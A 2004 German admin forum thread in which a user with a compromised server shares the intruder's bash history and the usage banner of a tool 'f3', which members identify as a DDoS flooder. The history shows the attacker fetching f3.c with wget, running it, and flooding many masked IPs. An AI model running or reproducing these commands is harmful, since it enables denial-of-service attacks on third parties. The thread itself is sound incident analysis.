wer kennt f3?

Lesenswerte Artikel, Anleitungen und Diskussionen
malte
Posts: 25
Joined: 2004-02-21 17:59

wer kennt f3?

Post by malte » 2004-02-26 19:16

hallo,

mein server wurde mal am anfang des jahres übernommen und dort wurde ein tool namens f3 rufkopiert und ausgeführt auf diverse domains. hat unheimlich viel traffic gemacht, ca 13gb in 4-5h aber sonst nix hoch oder runtergeladen. habs mir mal local aufm server @home kopiert und auf einen anderen rechner im lan getestet, konnte aber nichts feststellen.
leider ist das programm auf spanisch, unter den infos kann man sehen wer es programmiert hat und das es wohl aus kolumbien kommt, mehr infos konnte ich nicht rausfinden, auch nicht im inet. kennt es jemand oder weiss wozu es gut ist?

hier ein auszug aus der bashhistory:

Code: Select all

w
uname -a
id
w
ps -x
uname -a
w
./dario http://eine.domain.com/index.php?skin=
ps
ps -x
killall -9 f3
ps -x
w
traceroute xxx.227.180.1
./traceroute xxx.227.180.1
ls
ping xxx.242.84.2
ping xxx.2.54.89
ping xxx.2.54.89
cd /dev/shm
cd /var/tmmp
cd /var/tmp
./f3
./f3 xxx.2.54.89 65535 650000
./f3 xxx.40.230.111 95535 650000
./f3 xxx.40.230.111 65535 650000
./f3 xxx.74.97.147 65535 650000
./f3 xxx.163.186.225 65535 650000
tracerouter xxx.163.13.1
./f3
./f3 xxx.241.68.126 65535 650000
./f3 xxx.242.84.2 65535 650000
./f3 xxx.242.84.2 65535 650000
./f3 xxx.193.224.254 65535 650000
./f3 xxx.147.23.185 65535 650000
clear
./f3 xxx.0.208.94 65535 650000
./f3 xxx.242.84.2 65535 650000
./f3 xxx.242.84.4 65535 650000
free
finger
who
w
./f3 xxx.165.229.193 65535 650000
./f3 xxx.165.229.193 65535 650000
./f3 xxx.165.229.193 65535 650000
./f3 xxx.0.136.209 65535 650000
./f3 xx.10.136.209 65535 650000
./f3 xxx.242.84.2 35535 650000
ls
ls
ls
cd /tmp
cd
ls
cd
ls
cd /var/tmp
ls
./f3 xxx.252.155.2 65535 650000
./f3 xxx.174.95.130 65535 650000
cd /dev/shm
ls
cd /var/tmp
uname -a
ls
cd /tmp
ls
cd /var/tmp
ls
wget einedomain.net/f3.c
mv f3.c f3
chmod +x f3
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
ls
killall -9 f3
./f3 xxx.199.201.70 65535 6500 &
killall -9 f3
ps x
w
ping xxx.226.124.6
ls
./f3 xxx.199.201.70 65535 6500 &
killall -9 f3
ping xxx.223.3.133
ping xxx.242.84.2
ping xxx.241.68.12
traceroute xxx.242.84.1
ping xxx.141.76.214
ping xx.106.149.37
ping xx.106.149.37
./f3 xx.106.149.37 65535 6500
./f3 xx.106.149.37 65535 6500 &
ping xx.106.149.37
traceroute xxx.198.128.1
ping xx.106.149.37
./f3 xxx.217.63.27 65535 6500 &
ping xxx.217.63.27
kill -9 22566
ping xx.106.149.37
ps x
killall -9 f3
cd /dev/shm
./f3
cd /var/tmp
./f3
nmap

lufthansen
Posts: 390
Joined: 2002-09-24 17:31
Location: NRW

Re: wer kennt f3?

Post by lufthansen » 2004-02-26 19:29

sieht böse aus .....
rootkit oder so ?
hasse den src irgendwo ?

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: wer kennt f3?

Post by Joe User » 2004-02-26 19:47

Mal abgesehen davon, dass die History entweder lückenhaft, oder gefälscht ist, ist lediglich die f3.c verwertbar. Da Du allerdings die IPs/Domains verschleierst, können wir Dir nicht weiterhelfen...
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

malte
Posts: 25
Joined: 2004-02-21 17:59

Re: wer kennt f3?

Post by malte » 2004-02-26 20:40

ja war mir nich sicher ob ich die ips einfach so posten soll, ändert doch aber auch nix an der tatsache oder? den src von f3 hab ich nicht, nur noch das orginale programm.

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: wer kennt f3?

Post by Joe User » 2004-02-26 21:11

Schicke mir die unverfälschte History bitte per eMail...
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

dea
RSAC
Posts: 619
Joined: 2002-08-13 12:05

Re: wer kennt f3?

Post by dea » 2004-02-26 21:20

malte wrote:ja war mir nich sicher ob ich die ips einfach so posten soll, ändert doch aber auch nix an der tatsache oder? den src von f3 hab ich nicht, nur noch das orginale programm.
Lass' doch bitte mal file, strings, strace und ldd über das "originale Programm" drüber rutschen und poste die Ausgabe hier. Dürfte effizienter sein, als längst vergangene Warez-Server zu durchforsten ;)

Ich würde fast auf trinoo tippen ...

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: wer kennt f3?

Post by Joe User » 2004-02-26 21:46

dea wrote:Ich würde fast auf trinoo tippen ...
Kurze Suche per Google: Du meinst aber nicht das "DDoS-Tool"?
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

malte
Posts: 25
Joined: 2004-02-21 17:59

Re: wer kennt f3?

Post by malte » 2004-02-27 00:45

ok hier ein paar infos:

ldd f3:
libc.so.6 => /lib/libc.so.6
/lib/ld-linux.so.2 => /lib/ld-linux.so.2

strings und strace hab ich grade nich drauf...

./f3:
FUDEDOR (v3.0) by bonny - PRIVATE!@#!
!AJUDA!: ./f3 -help
CREDITS: ./f3 -credits
!USAGE!: ./f3 (host/ip) (size) (loops)
(host/ip) == host do babaca a ser fudido.
(size) == bytes a serem enviados.
(loops) == tempo da fudecae/s.

./f3 -help:
!HELP! beta version.
!HELP!
!HELP! #brazil@efnet - eleet team
!HELP! + code by bonny ::: bonny@hacker.com.br

./f3 -credits:
!CREDITS! * creditos aos amigos e a quem me a judou.
!CREDITS!
!CREDITS! * none (root@suid.net) ::: Brazil
!CREDITS! packet spoof
!CREDITS!
!CREDITS! * cyclone (cyc@pop.com.br) ::: Brazil
!CREDITS! parceiro das hackadas, aprende rapido
!CREDITS!
!CREDITS! * mariana (mazinha@brasil.org) ::: Brazil
!CREDITS! minha leet girl, exclusiva :)
!CREDITS!
!CREDITS! * alcaloide (root@faggot.net) ::: Brazil
!CREDITS! super lamer, versao 3 pra pacotar ele



versteht jemand die sprache? :D

the_postman
Posts: 42
Joined: 2003-03-08 22:20

Re: wer kennt f3?

Post by the_postman » 2004-02-27 09:20

scheint mir doch sehr stark nach nem ddos-tool zu riechen.

dea
RSAC
Posts: 619
Joined: 2002-08-13 12:05

Re: wer kennt f3?

Post by dea » 2004-02-27 10:34

the_postman wrote:scheint mir doch sehr stark nach nem ddos-tool zu riechen.
Wieso das denn? Es würde mich zwar nicht wundern, aber die derzeitigen Erkenntnisse lassen noch keine belastbaren Rückschlüsse zu.
malte wrote:strings und strace hab ich grade nich drauf...
Das ist mal richtig schade, denn ausgerechnet von den zweien erhoffte ich mir am meisten Informationen.

Ziemlich riskant, das Teil einfach auszuführen ... *puh*

Die (brasilianische) Ausgabe(n) hättest Du auch mit strings bekommen, vll. sogar noch zusätzliche wertvollere Informationen.

outofbound
Posts: 470
Joined: 2002-05-14 13:02
Location: Karlsruhe City

Re: wer kennt f3?

Post by outofbound » 2004-02-27 10:52

Oehm, ich würde schon denken, dass es ein DoS- Tool ist.

a) Traffic
b) bash_history (Wenn Sie denn so stimmt), die Kommandozeile ist ziemlich verräterisch.


Gruss,

Out

flolein
Posts: 113
Joined: 2003-12-11 14:47

Re: wer kennt f3?

Post by flolein » 2004-02-27 11:50

Der Source liegt im Google-Cache.
Last edited by flolein on 2004-02-27 11:55, edited 1 time in total.

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: wer kennt f3?

Post by Joe User » 2004-02-27 11:53

Die Domain, von welcher das f3.c geladen wurde, wurde 09/2003 von/über bol.com.br registriert und wird (derzeit) per zoneedit.com verwaltet. Zum Zeitpunkt meiner Nachforschung wurde die Domain auf einen (nicht erreichbaren) Kundenaccount bei bol.com.br weitergeleitet.

Es handelt sich IMO um eine angepasste Version des genannten DDoS-Tool.

PS: Näheres zur Arbeitsweise dieses DDoS-Tools gibt es unter:
http://staff.washington.edu/dittrich/mi ... o.analysis
http://staff.washington.edu/dittrich/misc/tfn.analysis
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: wer kennt f3?

Post by Joe User » 2004-02-27 11:56

flolein wrote:Der Source liegt im Google-Cache.
404 -> Aber noch im Cache...
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

flolein
Posts: 113
Joined: 2003-12-11 14:47

Re: wer kennt f3?

Post by flolein » 2004-02-27 12:03

sag ich doch :)

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: wer kennt f3?

Post by Joe User » 2004-02-27 12:06

:oops:
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

malte
Posts: 25
Joined: 2004-02-21 17:59

Re: wer kennt f3?

Post by malte » 2004-02-27 16:17

dea wrote: Ziemlich riskant, das Teil einfach auszuführen ... *puh*

Die (brasilianische) Ausgabe(n) hättest Du auch mit strings bekommen, vll. sogar noch zusätzliche wertvollere Informationen.
denke nicht das es riskant war, war auf ner virtuellen maschine unter vmware getestet, local.

hm vielleicht install ich dann mal strings und strace auf dem system.

flolein
Posts: 113
Joined: 2003-12-11 14:47

Re: wer kennt f3?

Post by flolein » 2004-02-27 16:35

kannst du dir sparen, der source ist ja wie gesagt problemlos per google verfügbar.

malte
Posts: 25
Joined: 2004-02-21 17:59

Re: wer kennt f3?

Post by malte » 2004-02-27 20:29

ahso ok :)

dea
RSAC
Posts: 619
Joined: 2002-08-13 12:05

Re: wer kennt f3?

Post by dea » 2004-02-27 21:26

flolein wrote:kannst du dir sparen, der source ist ja wie gesagt problemlos per google verfügbar.
Wenn Du mir mal mit der passenden Abfrage aushelfen könntest - die URL scheinst Du ja rausgenommen zu haben :/